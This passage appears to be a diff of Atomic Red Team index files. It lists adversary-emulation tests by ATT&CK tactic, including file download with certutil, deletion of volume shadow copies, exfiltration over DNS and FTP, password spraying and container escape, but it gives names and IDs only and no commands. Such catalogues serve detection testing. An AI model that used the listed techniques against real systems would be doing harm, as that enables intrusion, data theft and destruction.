986 command-and-control T1105 Ingress Tool Transfer 7 certutil download (urlcache) dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 command_prompt
987 command-and-control T1105 Ingress Tool Transfer 8 certutil download (verifyctl) ffd492e3-0455-4518-9fb1-46527c9f241b powershell
988 command-and-control T1105 Ingress Tool Transfer 9 Windows - BITSAdmin BITS Download a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b command_prompt
989 command-and-control T1105 Ingress Tool Transfer 10 Windows - PowerShell Download 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 powershell
990 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
991 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
992 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
993 command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
994 command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
995 command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
996 command-and-control T1105 Ingress Tool Transfer 18 Curl Download File 2b080b99-0deb-4d51-af0f-833d37c4ca6a command_prompt
997 command-and-control T1105 Ingress Tool Transfer 19 Curl Upload File 635c9a38-6cbf-47dc-8615-3810bc1167cf command_prompt
998 command-and-control T1105 Ingress Tool Transfer 20 Download a file with Microsoft Connection Manager Auto-Download d239772b-88e2-4a2e-8473-897503401bcc command_prompt
999 command-and-control T1105 Ingress Tool Transfer 21 MAZE Propagation Script 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf powershell
1000 command-and-control T1105 Ingress Tool Transfer 22 Printer Migration Command-Line Tool UNC share folder into a zip file 49845fc1-7961-4590-a0f0-3dbcf065ae7e command_prompt
1001 command-and-control T1105 Ingress Tool Transfer 23 Lolbas replace.exe use to copy file 54782d65-12f0-47a5-b4c1-b70ee23de6df command_prompt
1002 command-and-control T1105 Ingress Tool Transfer 24 Lolbas replace.exe use to copy UNC file ed0335ac-0354-400c-8148-f6151d20035a command_prompt
1003 command-and-control T1105 Ingress Tool Transfer 25 certreq download 6fdaae87-c05b-42f8-842e-991a74e8376b command_prompt
1004 command-and-control T1105 Ingress Tool Transfer 26 Download a file using wscript 97116a3f-efac-4b26-8336-b9cb18c45188 command_prompt
1005 command-and-control T1105 Ingress Tool Transfer 28 Nimgrab - Transfer Files b1729c57-9384-4d1c-9b99-9b220afb384e command_prompt
1006 command-and-control T1105 Ingress Tool Transfer 29 iwr or Invoke Web-Request download c01cad7f-7a4c-49df-985e-b190dcf6a279 command_prompt
1007 command-and-control T1090.001 Proxy: Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
1008 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
1009 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1010 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1011 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1012 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1013 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1014 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1015 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
1016 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
1017 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1018 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1019 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
1020 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
1021 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
1022 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
1023 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
1024 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
1025 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
1026 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
1027 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1028 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1029 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1030 impact T1529 System Shutdown/Reboot 10 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1031 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1032 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
1033 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1034 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1035 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
1036 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1037 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1038 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1039 initial-access T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1040 initial-access T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1041 exfiltration T1567 Exfiltration Over Web Service 1 Data Exfiltration with ConfigSecurityPolicy 5568a8f4-a8b1-4c40-9399-4969b642f122 powershell
1042 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
1043 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
1044 exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
1045 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
1046 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
1047 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
1048 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
1049 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
1050 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 6 MAZE FTP Upload 57799bc2-ad1e-4130-a793-fb0c385130ba powershell
1051 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 7 Exfiltration Over Alternative Protocol - FTP - Rclone b854eb97-bf9b-45ab-a1b5-b94e4880c56b powershell
atomics/Indexes/Indexes-Markdown/azure-ad-index.md
-75
View File
@@ -1,75 +0,0 @@
# Azure AD Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1606.002 Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- Atomic Test #7: Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) [azure-ad]
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
- Atomic Test #8: AzureAD - adding permission to application [azure-ad]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/containers-index.md
-82
View File
@@ -1,82 +0,0 @@
# Containers Atomic Tests by ATT&CK Tactic & Technique
# discovery
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [containers]
# persistence
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/google-workspace-index.md
-80
View File
@@ -1,80 +0,0 @@
# Google Workspace Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
